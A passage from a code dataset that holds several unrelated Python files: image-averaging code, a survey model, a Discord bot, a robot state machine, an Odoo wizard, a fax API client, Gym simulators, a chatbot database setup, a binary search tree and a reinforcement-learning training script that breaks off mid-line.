np.zeros([636,944])\r\n#proms = list()\r\n#r = 130\r\n#for k in range(0,6):\r\n# centro = coordinates[k][:]\r\n# for i in range(0,635):\r\n# for j in range(0,943):\r\n# d = np.sqrt( abs( (centro[0] - i)**2 + (centro[1] - j)**2 ) ) \r\n# if d <= r:\r\n# I_new[i,j] = I_gray[i,j]\r\n# \r\n#fig = plt.figure()\r\n#ax1 = fig.add_subplot(111)\r\n#ax1.axis('off')\r\n#ax1.imshow(I_new,cmap='gray')\r\n \r\n #-Entradas: Imagen en escala de grises I_gray, coordenadas de los centros\r\n #coordinates, las dimensiones más pequeñas dim como una lista de 2, y el radio.\r\n#@@ -134,44 +141,66 @@ \r\n#def corr2d(I_gray,t_name,folder,name,ind):\r\n# def pozos(I_gray,coordinates,r):\r\ndef pozos(I_gray,centro,r):\r\n h,w = I_gray.shape\r\n I_new = np.zeros([h,w])\r\n# for k in range(0,len(coordinates)):\r\n# centro = coordinates[k][:]\r\n for i in range(0,h):\r\n for j in range(0,w):\r\n d = np.sqrt( abs( (centro[1] - i)**2 + (centro[0] - j)**2 ) ) \r\n if d <= r:\r\n I_new[i,j] = I_gray[i,j]\r\n# r = 130\r\n# for i in range(0,h):\r\n# for j in range(0,w):\r\n# x = centro[1] - i\r\n# y = centro[0] - j\r\n# d = np.sqrt(abs( np.square(x) + np.square(y) ))\r\n# if any(d <= r):\r\n# I_new[i,j] = I_gray[i,j]\r\n# fig = plt.figure()\r\n# ax1 = fig.add_subplot(111)\r\n# ax1.axis('off')\r\n# ax1.imshow(I_new,cmap='gray')\r\n return I_new\r\n\r\n#h,w = I_gray.shape\r\n#I_new = np.zeros([h,w])\r\n#r = 130\r\n#for i in range(0,h):\r\n# for j in range(0,w):\r\n# x = coord[:,0] - i\r\n# y = coord[:,1] - j\r\n# d = np.sqrt(abs( np.square(x) + np.square(y) ))\r\n# if any(d <= r):\r\n# I_new[i,j] = I_gray[i,j]\r\n \r\n \r\n#list comprehension\r\n\r\n#>>> [(x, y) for x in [1,2,3] for y in [3,1,4] if x != y]\r\n\r\n#d = np.sqrt(abs(centro-dim))\r\n#I_gray = resize(I_gray,dim)\r\n#I_new = pozos(I_gray,coord,r)\r\n\r\n\r\n# In[] Promedio de ensambles\r\n#Mínima dimensión de las imágenes (CORREGIR)\r\nmin_h = 606\r\nmin_w = 914\r\n\r\nI_ensamble = np.zeros([606,914])\r\n#for i in range(0,len(folder_ids)):\r\nfor j in range(0,len(image_ids[1][:])):\r\n PATH = gen + folder_ids[1] + '/' + image_ids[1][j]\r\n I = imread(PATH)\r\n I_gray = rgb2gray(I)\r\n I_gray = resize(I_gray,(min_h,min_w)) \r\n I_ensamble = I_ensamble + I_gray\r\n \r\nI_ensamble = I_ensamble/28\r\nI_new = pozos(I_gray,coord,r)\r\n \r\nfig = plt.figure()\r\nax1 = fig.add_subplot(111)\r\nax1.axis('off')\r\nax1.imshow(I_ensamble,cmap='gray')\r\nax1.imshow(I_new,cmap='gray')\r\n \r\nprint(np.mean(I_ensamble[:]))\r\n \r\nscipy.misc.imsave('Resultados/Promedio1.png' ,I_ensamble)\r\n# In[]\r\n\r\n#r = 50\r\ndef circle(r):\r\n dim = r*2 + 10\r\n Nigerrimo = np.zeros([dim,dim])\r\n centro = [dim/2,dim/2]\r\n for i in range(0,dim):\r\n for j in range(0,dim):\r\n d = np.sqrt(abs( (centro[0] - i)**2 + (centro[1] - j)**2 ))\r\n if d > r:\r\n Nigerrimo[i,j] = 1\r\n return Nigerrimo\r\n\r\n#c = circle(r)\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111)\r\n#ax.axis('off')\r\n#ax.imshow(c,cmap='gray')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256093488","text":"class Survey(object):\n \"\"\"\n Copyright (C) Sam Esla, 2016. MIT License. https://opensource.org/licenses/MIT\n This is a preliminary model of the Survey hierarchy and its subordinate parts.\n In order, they are: Survey>Pages>Questions>Options . This is what stores all\n the survey information and questions and their positioning. I have simply left\n out much of the irrelevant (for our purposes) parts of the objects. This may\n change.\n \"\"\"\n def __init__(self, survey_id, title, pages=[], questions=[]):\n self.id = survey_id\n self.title = title\n self.questions = questions\n self.pages = pages\n if pages is not None and len(pages) > 1:\n self.pages.sort(key=lambda page: page.position)\n if questions is not None and len(questions) > 1:\n self.questions.sort(key=lambda question: question.position)\n\n def add_page(self, page):\n self.pages.append(page)\n self.pages.sort(key=lambda page: page.position)\n\n def add_question(self, question):\n self.questions.append(question)\n self.questions.sort(key=lambda question: question.position)\n\n @staticmethod\n def consume_raw_api(survey_details):\n # make sure to have this json parsed before sending it here.\n try:\n survey = Survey(survey_details[\"id\"], survey_details[\"title\"], [], [])\n\n for raw_pg in survey_details[\"pages\"]:\n page = Page(raw_pg[\"id\"],\n raw_pg[\"position\"],\n [])\n for raw_que in raw_pg[\"questions\"]:\n question = Question(raw_que[\"id\"],\n raw_que[\"headings\"][0][\"heading\"],\n page.id,\n raw_que[\"position\"],\n [],\n raw_que[\"family\"])\n page.add_question(question)\n for raw_opt in raw_que[\"answers\"][\"choices\"]:\n option = Option(raw_opt[\"id\"],\n raw_opt[\"text\"],\n raw_opt[\"position\"])\n question.add_option(option)\n survey.add_page(page)\n\n for page in survey.pages:\n for question in page.questions:\n survey.questions.append(question)\n return survey\n except Exception as e:\n print(e)\n print(\"Failed to parse JSON Survey\")\n return None\n\n\nclass Page(object):\n def __init__(self, page_id, position, questions=[]):\n self.id = page_id\n self.position = position\n self.questions = questions\n if questions is not None and len(questions) > 1:\n self.questions.sort(key=lambda question: question.position)\n\n def add_question(self, question):\n self.questions.append(question)\n self.questions.sort(key=lambda question: question.position)\n\n\nclass Question(object):\n def __init__(self, question_id, heading, page_id, position, options=[], family=\"single-choice\"):\n self.id = question_id\n self.heading = heading\n self.page_id = page_id\n self.options = options\n self.type = family\n self.position = position\n if options is not None and len(options) > 1:\n self.options.sort(key=lambda option: option.position)\n\n def add_option(self, option):\n self.options.append(option)\n self.options.sort(key=lambda option: option.position)\n\n\nclass Option(object):\n def __init__(self, option_id, text, position):\n self.text = text\n self.id = option_id\n self.position = position\n self.selected = False","sub_path":"survey_model.py","file_name":"survey_model.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"108429905","text":"import random\nimport asyncio\nimport aiohttp\nimport json\nfrom discord import Game, Embed\nfrom discord.ext.commands import Bot\nimport os\n\ndescription_play = ''\n\nBOT_PREFIX = (\"!\")\nwith open('TOKEN.txt', 'r') as f:\n TOKEN = f.readline()\n\nclient = Bot(command_prefix=BOT_PREFIX)\nplayer, voice = None, None\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(game=Game(name=\"PUBG MOBILE\"))\n print(\"Logged in as \" + client.user.name)\n\n\nasync def list_servers():\n await client.wait_until_ready()\n while not client.is_closed:\n print(\"Current servers:\")\n for server in client.servers:\n print(server.name)\n await asyncio.sleep(600)\n\nif __name__ == '__main__':\n for extension in 'CatOrDog', 'Sounds', 'LevelingSystem':\n client.load_extension(extension)\n client.loop.create_task(list_servers())\n client.run(TOKEN)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"368472007","text":"import mp.states as states\nimport gin\n\n\n@gin.configurable\nclass MPPGStateMachine(states.StateMachine):\n def build(self):\n self.goto_init_pose = states.GoToInitPoseState(self.env)\n self.align_object = states.AlignObjectSequenceState(self.env)\n self.planned_grasp = states.PlannedGraspState(self.env)\n self.move_to_goal = states.MoveToGoalState(self.env)\n self.wait = states.WaitState(\n self.env, 30 if self.env.simulation else 1000)\n self.failure = states.FailureState(self.env)\n\n # define transitions between states\n self.goto_init_pose.connect(next_state=self.align_object,\n failure_state=self.failure)\n self.align_object.connect(next_state=self.planned_grasp,\n failure_state=self.failure)\n self.planned_grasp.connect(next_state=self.move_to_goal,\n failure_state=self.align_object)\n self.move_to_goal.connect(next_state=None, failure_state=self.wait)\n self.wait.connect(next_state=self.goto_init_pose,\n failure_state=self.failure)\n\n # return initial state\n return self.goto_init_pose\n","sub_path":"python/residual_learning/state_machines.py","file_name":"state_machines.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139877987","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2015 be-cloud.be\n# Jerome Sonnet \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nimport logging\n\nfrom openerp import api, fields, models, _\nfrom openerp.exceptions import MissingError\nfrom openerp.tools.safe_eval import safe_eval\n\n_logger = logging.getLogger(__name__)\n\nclass AssignProgram(models.TransientModel):\n _name = \"school.assign.program\"\n _description = \"Assign Program to Student\"\n \n year_id = fields.Many2one('school.year', string='Year', default=lambda self: self.env.user.current_year_id, ondelete='cascade')\n student_id = fields.Many2one('res.partner', string='Students', domain=\"[('student', '=', '1')]\", ondelete='cascade')\n program_id = fields.Many2one('school.individual_program', string=\"Program\", domain=\"[('student_id', '=', student_id)]\", ondelete='cascade')\n source_bloc_id = fields.Many2one('school.bloc', string=\"Source Bloc\", ondelete='cascade')\n \n @api.multi\n @api.depends('year_id','student_id','source_bloc_id')\n def assign_program(self):\n if self.student_id:\n _logger.info(\"Assing program to %s\" % self.student_id.name)\n program = self.env['school.individual_bloc'].create({'year_id':self.year_id.id,'student_id': self.student_id.id,'source_bloc_id':self.source_bloc_id.id,'program_id':self.program_id.id})\n program.assign_source_bloc()\n # Hack to recompute\n self.student_id._get_student_current_program_id()\n # Return an action showing the created program\n action = self.env.ref('school_management.action_individual_bloc_form')\n result = action.read()[0]\n result['views'] = [(False, 'form')]\n result['res_id'] = program.id\n return result\n else :\n context = dict(self._context or {})\n student_ids = context.get('active_ids')\n ids = []\n for student in self.env['res.partner'].browse(student_ids):\n _logger.info(\"Assing program to %s\" % student.id)\n program = self.env['school.individual_bloc'].create({'year_id':self.year_id.id,'student_id': student.id,'source_bloc_id':self.source_bloc_id,'program_id':self.program_id.id})\n program.assign_source_bloc()\n # Hack to recompute\n student._get_student_current_program_id()\n ids.append(program.id)\n # Return an action showing the created programs\n action = self.env.ref('school_management.action_individual_bloc_form')\n result = action.read()[0]\n result['domain'] = [('id', 'in', ids)]\n return result\n \n ","sub_path":"school_registration/wizard/assign_program.py","file_name":"assign_program.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"538593707","text":"# -*- coding: utf-8 -*-\n# Module for Popbill FAX API. It include base functionality of the\n# RESTful web service request and parse json result. It uses Linkhub module\n# to accomplish authentication APIs.\n#\n# http://www.popbill.com\n# Author : Kim Seongjun (pallet027@gmail.com)\n# Written : 2015-01-21\n# Thanks for your interest. \nfrom datetime import datetime\nfrom .base import PopbillBase,PopbillException,File\n\nclass FaxService(PopbillBase):\n \"\"\" 팝빌 팩스 API Service Implementation. \"\"\"\n\n def __init__(self, LinkID, SecretKey):\n \"\"\"생성자\n args\n LinkID : 링크허브에서 발급받은 링크아이디(LinkID)\n SecretKeye 링크허브에서 발급받은 비밀키(SecretKey)\n \"\"\"\n super(self.__class__,self).__init__(LinkID,SecretKey)\n self._addScope(\"160\")\n \n def getURL(self, CorpNum, UserID, ToGo):\n \"\"\" 팩스 관련 팝빌 URL \n args\n CorpNum : 팝빌회원 사업자번호\n UserID : 팝빌회원 아이디\n TOGO : 팩스관련 기능 지정 문자. (BOX - 전송내역조회)\n return\n 30초 보안 토큰을 포함한 url\n raise \n PopbillException\n \"\"\"\n\n result = self._httpget('/FAX/?TG=' + ToGo , CorpNum,UserID)\n return result.url\n\n def getUnitCost(self,CorpNum):\n \"\"\" 팩스 전송 단가 확인\n args\n CorpNum : 팝빌회원 사업자번호\n return\n 전송 단가 by float\n raise \n PopbillException\n \"\"\"\n\n result = self._httpget('/FAX/UnitCost' ,CorpNum)\n return int(result.unitCost)\n\n\n def getFaxResult(self, CorpNum, ReceiptNum, UserID = None):\n \"\"\" 팩스 전송결과 조회\n args\n CorpNum : 팝빌회원 사업자번호\n ReceiptNum : 전송요청시 발급받은 접수번호\n UserID : 팝빌회원 아이디\n return\n 팩스전송정보 as list \n raise \n PopbillException\n \"\"\"\n\n return self._httpget('/FAX/' + ReceiptNum, CorpNum, UserID)\n\n\n def cancelReserve(self, CorpNum, ReceiptNum, UserID = None):\n \"\"\" 팩스 예약전송 취소\n args\n CorpNum : 팝빌회원 사업자번호\n ReceiptNum : 팩스 전송요청(sendFAX)시 발급받은 접수번호\n UserID : 팝빌회원 아이디\n return\n 처리결과. consist of code and message\n raise \n PopbillException\n \"\"\"\n\n return self._httpget('/FAX/' + ReceiptNum + '/Cancel', CorpNum, UserID)\n \n\n def sendFax(self, CorpNum, SenderNum, ReceiverNum, ReceiverName, FilePath, ReserveDT = None, UserID = None):\n \"\"\" 팩스 단건 전송\n args\n CorpNum : 팝빌회원 사업자번호\n SenderNum : 발신자 번호 \n ReceiverNum : 수신자 번호\n ReceiverName : 수신자 명 \n FilePath : 발신 파일경로 \n ReserveDT : 예약시간(형식 yyyyMMddHHmmss)\n UserID : 팝빌회원 아이디\n return\n 접수번호 (receiptNum)\n raise \n PopbillException\n \"\"\"\n receivers = []\n receivers.append(FaxReceiver(receiveNum = ReceiverNum,\n receiveName = ReceiverName)\n )\n\n return self.sendFax_multi(CorpNum, SenderNum, receivers, FilePath, ReserveDT, UserID)\n\n def sendFax_multi(self, CorpNum, SenderNum, Receiver, FilePath, ReserveDT = None , UserID = None):\n \"\"\" 팩스 전송\n args\n CorpNum : 팝빌회원 사업자번호\n SenderNum : 발신자 번호 (동보전송용)\n Receiver : 수신자 번호(동보전송용)\n FilePath : 발신 파일경로 \n ReserveDT : 예약시간(형식 yyyyMMddHHmmss)\n UserID : 팝빌회원 아이디\n return\n 접수번호 (receiptNum)\n raise \n PopbillException\n \"\"\"\n\n if SenderNum == None or SenderNum == \"\" :\n raise PopbillException(-99999999,\"발신자 번호가 입력되지 않았습니다.\")\n if Receiver == None:\n raise PopbillException(-99999999,\"수신자 정보가 입력되지 않았습니다.\")\n if not (type(Receiver) is str or type(Receiver) is FaxReceiver or type(Receiver) is list) :\n raise PopbillException(-99999999,\"'Receiver' argument type error. 'FaxReceiver' or List of 'FaxReceiver'.\")\n if FilePath == None :\n raise PopbillException(-99999999,\"발신 파일경로가 입력되지 않았습니다.\")\n if not (type(FilePath) is str or type(FilePath) is list) :\n raise PopbillException(-99999999,\"발신 파일은 파일경로 또는 경로목록만 입력 가능합니다.\")\n if type(FilePath) is list and (len(FilePath) < 1 or len(FilePath) > 5) :\n raise PopbillException(-99999999,\"파일은 1개 이상, 5개 까지 전송 가능합니다.\")\n\n req = {\"snd\" : SenderNum , \"fCnt\": 1 if type(FilePath) is str else len(FilePath) , \"rcvs\" : [] , \"sndDT\" : None}\n\n if(type(Receiver) is str): \n Receiver = FaxReceiver(receiveNum=Receiver)\n \n if(type(Receiver) is FaxReceiver):\n Receiver = [Receiver]\n\n for r in Receiver:\n req['rcvs'].append({\"rcv\" : r.receiveNum, \"rcvnm\" : r.receiveName})\n\n if ReserveDT != None :\n req['sndDT'] = ReserveDT\n\n postData = self._stringtify(req)\n\n if(type(FilePath) is str):\n FilePath = [FilePath]\n \n files = []\n\n for filePath in FilePath:\n with open(filePath,\"rb\") as f:\n files.append(File(fieldName='file',\n fileName=f.name,\n fileData=f.read())\n )\n \n result = self._httppost_files('/FAX',postData,files,CorpNum,UserID)\n\n return result.receiptNum\n\n\nclass FaxReceiver(object):\n def __init__(self,**kwargs):\n self.__dict__ = dict.fromkeys(['receiveNum','receiveName'])\n self.__dict__.update(kwargs)","sub_path":"popbill/faxService.py","file_name":"faxService.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"171673226","text":"import gym\n\nimport bonsai\nfrom bonsai_gym_common import GymSimulator, logging_basic_config\n\nENVIRONMENT = 'Acrobot-v1'\nRECORD_PATH = None\n# value grabbed from\n# https://github.com/openai/gym/blob/master/gym/envs/__init__.py\nMAX_EPISODE_LENGTH = 500\n\n\nclass AcrobotSimulator(GymSimulator):\n\n def __init__(self, env, record_path):\n GymSimulator.__init__(self, env,\n record_path=record_path,\n episode_limit=MAX_EPISODE_LENGTH)\n\n def get_state(self):\n parent_state = GymSimulator.get_state(self)\n state_dict = {\"cos_theta0\": parent_state.state[0],\n \"sin_theta0\": parent_state.state[1],\n \"cos_theta1\": parent_state.state[2],\n \"sin_theta1\": parent_state.state[3],\n \"theta0_dot\": parent_state.state[4],\n \"theta1_dot\": parent_state.state[5]}\n return bonsai.simulator.SimState(state_dict, parent_state.is_terminal)\n\n\nif __name__ == \"__main__\":\n logging_basic_config()\n env = gym.make(ENVIRONMENT)\n simulator = AcrobotSimulator(env, RECORD_PATH)\n bonsai.run_for_training_or_prediction(\"acrobot_simulator\", simulator)\n","sub_path":"acrobot_simulator.py","file_name":"acrobot_simulator.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"502658668","text":"import pymysql\nfrom chatbot.config.DatabaseConfig import *\n\ndb = None\n\ntry:\n #더 이상 패스워드를 직접 입력하여 관리하지 않습니다\n db = pymysql.connect(\n host=DB_HOST,\n user=DB_USER,\n passwd=DB_PASSWORD,\n db=DB_NAME,\n charset='utf8'\n )\n\n sql = '''\n CREATE TABLE IF NOT EXISTS `chatbot_train_data` (\n `id` INT UNSIGNED NOT NULL AUTO_INCREMENT,\n `intent` VARCHAR(45) NULL,\n `ner` VARCHAR(1024) NULL,\n `query` TEXT NULL,\n `answer` TEXT NOT NULL,\n `answer_image` VARCHAR(2048) NULL,\n PRIMARY KEY (`id`))\n ENGINE = InnoDB DEFAULT CHARSET = utf8\n '''\n\n with db.cursor() as cursor:\n\n # cursor 객체의 execute() 함수로 SQL 구문을 실행합니다\n cursor.execute(sql)\n\n # DB호스트에 연결된 객체(db)에 commit()를 통해 수정된 내용을\n # DB에 반영하여 줍니다.\n db.commit()\n\nexcept Exception as e:\n # DB 연결 실패 시 오류 내용 출력\n print(e)\n\nfinally:\n # DB 가 연결된 경우에만 접속 닫기 시도\n if db is not None:\n # 데이터베이스 서버 닫기\n db.close()\n print('table 생성 및 컬럼 설정 완료')","sub_path":"chatbot/train_tools/qna/create_train_data_table.py","file_name":"create_train_data_table.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152907988","text":"# Should a binary-search-tree be a reference to a\r\n# network of interconnected BSTNode's?\r\n# And how does that change the shape of the \r\n# insertion process/function?\r\n\r\nclass BSTree:\r\n def __init__(self, node):\r\n self._root = node\r\n\r\n def insert(self, v):\r\n if self._root is None:\r\n self._root = BSTNode(v, None, None)\r\n else:\r\n self._insert(self._root, v)\r\n\r\n def _insert(self, t, v):\r\n if (t.key() < v):\r\n if (t.rChild() is None):\r\n t._rChild = BSTNode(v, None, None)\r\n else:\r\n self._insert(t.rChild(),v)\r\n else:\r\n if(t.lChild() is None):\r\n t._lChild = BSTNode(v, None, None)\r\n else:\r\n self._insert(t.lChild(),v)\r\n #\r\n def buildTree(self, values):\r\n for v in values:\r\n self.insert(v)\r\n #\r\n def inorderPrint(self):\r\n if self._root is None:\r\n return\r\n self._inorderPrint(self._root)\r\n \r\n def _inorderPrint(self, treeRoot):\r\n if treeRoot is None:\r\n return # i.e., there's nothing to print!\r\n #\r\n self._inorderPrint(treeRoot.lChild())\r\n print (\"value: \", treeRoot.key())\r\n self._inorderPrint(treeRoot.rChild())\r\n\r\n def bstDistance(self, v1, v2):\r\n \"\"\"Calculates the distance, i.e., the number of \"graph edges\" on a path from the node\r\nthat has v1 as its key to the node that has v2 as its key.\r\nThe key insight is that:\r\nthe path from root down to each the two nodes, v1 and v2, may, in general, have some overlap,\r\ni.e., there may be some edges in common, some overlap, between the root-to-v1 path and \r\nthe root-to-v2 path.\r\nSo, if we just tracked those edges, and calculated those two paths, then calculate the intersection\r\nof those two sets, and subtract the intersection from both root-to-v paths, then we'd have two\r\npaths, the lengths of which add up to the distance between v1 and v2.\r\nBy taking advantage of the extra information bestowed by the binary-search-tree property,\r\nwe don't need to keep track of two root-to-node paths, and then try to calculate their \r\nintersection, etc. We can deduce the properties of the root-to-node paths from the extra\r\ninformation the binary search tree structure gives to us \"for free.\"\r\n\"\"\"\r\n if v2 < v1:\r\n v1, v2 = v2, v1 # swap them!\r\n #\r\n treeRoot = self._root\r\n #\r\n if treeRoot is None:\r\n return 0 # what is the distance when the tree is \"empty?\"\r\n #\r\n while v2 < treeRoot.key() or treeRoot.key() < v1:\r\n if v2 < treeRoot.key():\r\n treeRoot = treeRoot.lChild()\r\n # i.e., both v1, v2 lie in the left subtree of treeRoot\r\n else:\r\n treeRoot = treeRoot.rChild()\r\n # i.e., both v1, v2 lie in the right subtree of treeRoot\r\n #\r\n # Now, v1 <= treeRoot.key() and treeRoot.key() <= v2\r\n # Assuming that v1 != v2, then:\r\n # treeRoot.key() is the value of the \"deepest common ancestor\";\r\n # v1 lies in the left subtree of treeRoot AND v2 lies in the right subtree of treeRoot;\r\n # If it happens to be the case that:\r\n # v1 == treeRoot.key() and v2 == treeRoot.key()\r\n # then:\r\n # v1 == v2 by transitivity of ==.\r\n # If v1 == treeRoot.key() and treeRoot.key() < v2,\r\n # then the distance between the v1, v2 will simply be the number of hops down from v1 to v2.\r\n # Similarly for v1 < treeRoot.key() and treeRoot.key() == v2, eh?\r\n # \r\n # So, we must calculate the path length from treeRoot down to v1\r\n # and then calculate the path length from treeRoot down to v2:\r\n return self._pathFromRoot(treeRoot, v1) + self._pathFromRoot(treeRoot, v2)\r\n\r\n def _pathFromRoot(self, treeRoot, v):\r\n dist = 0\r\n #\r\n while treeRoot is not None and treeRoot.key() != v:\r\n if treeRoot.key() < v:\r\n treeRoot = treeRoot.rChild()\r\n else:\r\n treeRoot = treeRoot.lChild()\r\n #\r\n dist = dist + 1\r\n #\r\n return dist\r\n\r\nclass BSTNode:\r\n def __init__(self, data, lChild, rChild):\r\n self._data = data\r\n self._lChild = lChild\r\n self._rChild = rChild\r\n\r\n def lChild(self):\r\n return self._lChild\r\n\r\n def rChild(self):\r\n return self._rChild\r\n\r\n def key(self):\r\n return self._data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n myT = BSTree(BSTNode(1,None,None))\r\n #\r\n myT.insert(9)\r\n #\r\n myT.inorderPrint()\r\n #\r\n print (myT.bstDistance(1, 9))\r\n #\r\n myT2 = BSTree(None)\r\n myT2.buildTree([10,9,8,5,6,7,3,4,2,1])\r\n myT2.inorderPrint()\r\n print (myT2.bstDistance(7,8) == 3)\r\n\r\n myT3=BSTree(None)\r\n myT3.buildTree([1,8,9,10,5,6,7,3,4,2])\r\n print (myT3.bstDistance(4,7) == 4)\r\n \r\n","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637347886","text":"# the following 3 lines are helpful if you have multiple GPUs and want to train\n# agents on multiple GPUs. I do this frequently when testing.\n# import os\n# os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n# os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n# python3 main_sac.py mpc=0/1 nsteps=1000 ensemble_size cuda_model cuda_Agent policy comment\n#import pybullet_envs\nimport gym\nimport numpy as np\nfrom sac_torch import Agent\nfrom utils import plot_learning_curve\nimport numpy as np\nfrom modelbuffer import Buffer\nfrom models import Model\nfrom rewardmodel import RewardModel\nimport torch\nfrom normalizer import TransitionNormalizer\nimport matplotlib.pyplot as plt\nimport sys\nfrom mpc_contorller import MPCController\n\nimport logging\nimport datetime\nfrom continuous_cartpole import ContinuousCartPoleEnv\nimport time\n\n\ndef train_epoch(model, buffer, optimizer, batch_size, training_noise_stdev, grad_clip):\n losses = []\n\n for tr_states, tr_actions, tr_state_deltas, tr_rewards in buffer.train_batches(batch_size=batch_size):\n optimizer.zero_grad()\n loss = model.loss(tr_states, tr_actions, tr_state_deltas,\n training_noise_stdev=training_noise_stdev)\n losses.append(loss.item())\n loss.backward()\n torch.nn.utils.clip_grad_value_(model.parameters(), grad_clip)\n optimizer.step()\n\n return np.mean(losses)\n\n\ndef train_epoch_reward(rewardmodel, buffer, optimizer, batch_size, training_noise_stdev, grad_clip):\n losses = []\n for tr_states, tr_actions, tr_state_deltas, tr_rewards in buffer.train_batches(batch_size=batch_size):\n optimizer.zero_grad()\n loss = rewardmodel.loss(tr_states, tr_actions, tr_rewards,\n training_noise_stdev=training_noise_stdev)\n\n losses.append(loss.item())\n loss.backward()\n torch.nn.utils.clip_grad_value_(model.parameters(), grad_clip)\n optimizer.step()\n\n return np.mean(losses)\n\n\ndef get_optimizer_factory(lr, weight_decay):\n return lambda params: torch.optim.Adam(params,\n lr=lr,\n weight_decay=weight_decay)\n\n\ndef fit_model(buffer, n_epochs):\n\n optimizer = get_optimizer_factory(1e-3, 0)(model.parameters())\n for epoch_i in range(1, n_epochs + 1):\n tr_loss = train_epoch(model=model, buffer=buffer,\n optimizer=optimizer, batch_size=256, training_noise_stdev=0, grad_clip=5)\n\n modelloss.append(tr_loss)\n\n optimizer = get_optimizer_factory(1e-3, 0)(rewardmodel.parameters())\n\n for epoch_i in range(1, n_epochs + 1):\n tr_loss = train_epoch_reward(rewardmodel=rewardmodel, buffer=buffer,\n optimizer=optimizer, batch_size=256, training_noise_stdev=0, grad_clip=5)\n\n return model, rewardmodel\n\n\ndef square_mean_error(env, env_evaluate, actions, states, model_sum_reward, horizon, step):\n env_evaluate.reset()\n qpos = env.sim.data.qpos.copy()\n qvel = env.sim.data.qvel.copy()\n env_evaluate.set_state(qpos, qvel)\n real_sum_reward = 0\n for i in range(horizon):\n obs, reward, done, _ = env_evaluate.step(actions[i])\n real_sum_reward += reward\n\n if done:\n break\n if not done:\n state_square_error = np.square(obs - states[-1])\n state_square_error = state_square_error.sum()\n state_square_error /= env_evaluate.observation_space.shape[0]\n reward_error = model_sum_reward - real_sum_reward\n logging.info('state_square_error: %.3f reward_error: %.3f',\n state_square_error, reward_error)\n env.set_state(qpos, qvel)\n\n\ndef set_log(s):\n # ログレベルを DEBUG に変更\n now = datetime.datetime.now()\n filename = './' + s + 'log/' + 'log_' + \\\n now.strftime('%Y%m%d_%H%M%S') + '.log'\n # DEBUGする時用のファイル\n #filename = './saclog/logger.log'\n formatter = '%(levelname)s : %(asctime)s : %(message)s'\n\n logging.basicConfig(filename=filename,\n level=logging.DEBUG, format=formatter)\n\n\nif __name__ == '__main__':\n\n args = sys.argv\n #env_id = 'LunarLanderContinuous-v2'\n\n # env_id = 'BipedalWalker-v2'\n # env_id = 'AntBulletEnv-v0'\n # env_id = 'InvertedPendulumBulletEnv-v0'\n # env_id = 'CartPoleContinuousBulletEnv-v0'\n\n #env_id = 'MountainCarContinuous-v0'\n\n # env_id = 'CartPole-v1'\n\n #env_id = 'HalfCheetah-v2'\n # env_id='Ant-v2'\n env_id = args[6]\n env = gym.make(env_id)\n env_evaluate = gym.make(env_id)\n env_id = 'Continuous_CartPole'\n env = ContinuousCartPoleEnv()\n use_mpc = int(args[1])\n\n if use_mpc == 0:\n set_log('sac')\n logging.info('method: %s', 'Soft-Actor Critic')\n else:\n set_log('mpc')\n logging.info('method: %s', 'Model Predictive Contorol')\n # mpc=MPC()\n n_steps = int(args[2])\n n_games = 1\n ensemble_size = int(args[3])\n n_spaces = env.observation_space.shape[0]\n\n n_actions = env.action_space.shape[0]\n print('spaces %d actions %d' % (n_spaces, n_actions))\n logging.info('parameter n_steps: %d ensemble_size: %d env: %s',\n n_steps, ensemble_size, env_id)\n buffer = Buffer(n_spaces, n_actions, 1, ensemble_size, 1000000)\n model_cuda = args[4]\n model = Model(model_cuda, n_actions, n_spaces,\n 512, 3, ensemble_size=ensemble_size)\n rewardmodel = RewardModel(model_cuda, n_actions, n_spaces, 1,\n 512, 3, ensemble_size=ensemble_size)\n modelloss = []\n rewards = []\n agent_cuda = args[5]\n agent = Agent(agent_cuda, alpha=0.0003, beta=0.0003, reward_scale=2, env_id=env_id,\n input_dims=env.observation_space.shape, tau=0.005,\n env=env, batch_size=256, layer1_size=256, layer2_size=256,\n n_actions=n_actions)\n horizon = int(args[9])\n num_control_samples = 100\n num_elite = 30\n grad_steps = 10\n mpc = MPCController(agent_cuda, env, horizon=horizon, num_control_samples=num_control_samples, num_elite=num_elite, agent=agent,\n model=model, rewardmodel=rewardmodel, model_buffer=buffer)\n\n if use_mpc == 1:\n logging.info('mpc horizon: %d mpc_samples: %d elite_sample: %d grad_steps: %d',\n horizon, num_control_samples, num_elite, grad_steps)\n function_name = args[7]\n\n if function_name == 'random':\n func = mpc.get_action_random\n elif function_name == 